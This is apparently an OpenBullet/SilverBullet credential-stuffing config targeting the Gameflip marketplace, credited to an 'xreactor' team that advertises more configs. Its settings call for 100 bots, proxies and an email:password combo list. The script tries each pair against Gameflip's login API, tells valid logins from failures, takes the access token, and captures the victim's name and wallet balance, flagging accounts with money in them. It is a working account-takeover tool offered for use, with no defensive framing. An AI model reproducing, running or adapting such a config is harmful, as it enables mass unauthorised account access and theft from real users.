[SETTINGS]
{
  "Name": "gameflip | xreactor.org",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-01-30T16:42:41.8098603+02:00",
  "AdditionalInfo": "more configs:xreactor.org",
  "RequiredPlugins": [],
  "Author": "@uzzzul | @xreactor_team",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "gameflip",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#LOGIN REQUEST POST "https://production-gameflip.fingershock.com/marketplace/auth/identity/callback" 
  CONTENT "{\"client\":\"marketplace\",\"username\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: production-gameflip.fingershock.com" 
  HEADER "Content-Type: application/json" 
  HEADER "Origin: https://gameflip.com" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Connection: keep-alive" 
  HEADER "Accept: application/json, text/javascript, */*; q=0.01" 
  HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 14_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1" 
  HEADER "Referer: https://gameflip.com/" 
  HEADER "Content-Length: 68" 
  HEADER "Accept-Language: en-us" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "\"status\": \"FAILURE\"," 
    KEY "invalid_credentials" 
  KEYCHAIN Success OR 
    KEY "\"status\": \"SUCCESS\"," 

#tk PARSE "<SOURCE>" JSON "access_token" -> VAR "tk" 

#CAPTURE_1 REQUEST GET "https://production-gameflip.fingershock.com/api/v1/account/me/profile" 
  
  HEADER "Host: production-gameflip.fingershock.com" 
  HEADER "Accept: */*" 
  HEADER "Connection: keep-alive" 
  HEADER "X-Gameflip-Install-Id: C5E480E6-08AD-496E-BAB7-D55AEE19B730" 
  HEADER "User-Agent: Gameflip-iOS/11.3.0 (iPhone12,1; OS 14.7.1; en-us)" 
  HEADER "Accept-Language: en-LB;q=1, ar-LB;q=0.9" 
  HEADER "Authorization: Gameflip <tk>" 
  HEADER "Accept-Encoding: gzip, deflate, br" 

#first_name PARSE "<SOURCE>" JSON "first_name" -> VAR "firstname" 

#last_name PARSE "<SOURCE>" JSON "last_name" -> VAR "lastname" 

#NAME FUNCTION Constant "<firstname><lastname>" -> CAP "NAME" 

#CAPTURE_2 REQUEST GET "https://production-gameflip.fingershock.com/api/v1/account/me/wallet_history?balance_only=" 
  
  HEADER "Host: production-gameflip.fingershock.com" 
  HEADER "Accept: */*" 
  HEADER "Connection: keep-alive" 
  HEADER "X-Gameflip-Install-Id: C5E480E6-08AD-496E-BAB7-D55AEE19B730" 
  HEADER "User-Agent: Gameflip-iOS/11.3.0 (iPhone12,1; OS 14.7.1; en-us)" 
  HEADER "Accept-Language: en-LB;q=1, ar-LB;q=0.9" 
  HEADER "Authorization: Gameflip <tk>" 
  HEADER "Accept-Encoding: gzip, deflate, br" 

#BALANCE PARSE "<SOURCE>" JSON "balance" CreateEmpty=FALSE -> CAP "BALANCE" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<BALANCE>" NotEqualTo "0" 
  KEYCHAIN Custom "FREE" OR 
    KEY "<BALANCE>" EqualTo "0" 

#AUTHOR FUNCTION Constant "@uzzzul | @xreactor_team" -> CAP "configby" 

